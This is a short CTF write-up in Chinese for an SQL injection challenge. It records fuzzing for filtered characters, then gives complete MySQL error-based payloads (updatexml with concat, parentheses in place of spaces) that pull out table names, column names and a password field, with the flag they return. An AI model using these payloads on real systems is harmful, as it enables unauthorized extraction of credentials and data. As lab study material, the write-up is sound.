Subject

SQL Injection

Mind Palace

先fuzz一下，浏览被过滤的字符

updatexml | ()... 没有被过滤 => 报错注入

构造payload得到数据库名：

1'or(updatexml(1,concat(0x7e,database()),1))%23

依次注入得到表名和字段名：

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek"))),1))%23

==> '~H4rDsq1'

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1"))),1))%23

==> '~id,username,password'

获得数据：

1'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))),1))%23

==> '~flag{a667ee9e-e0af-401f-b60b-27' 没显示完全 ==> left right

1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(id)like(1))),1))%23

==> '~e-e0af-401f-b60b-27036db80b6d}'
==> flag: flag{a667ee9e-e0af-401f-b60b-27036db80b6d}

Look Ahead

fuzz查看过滤字符；报错注入；用括号绕过空格

END ╰（‵□′）╯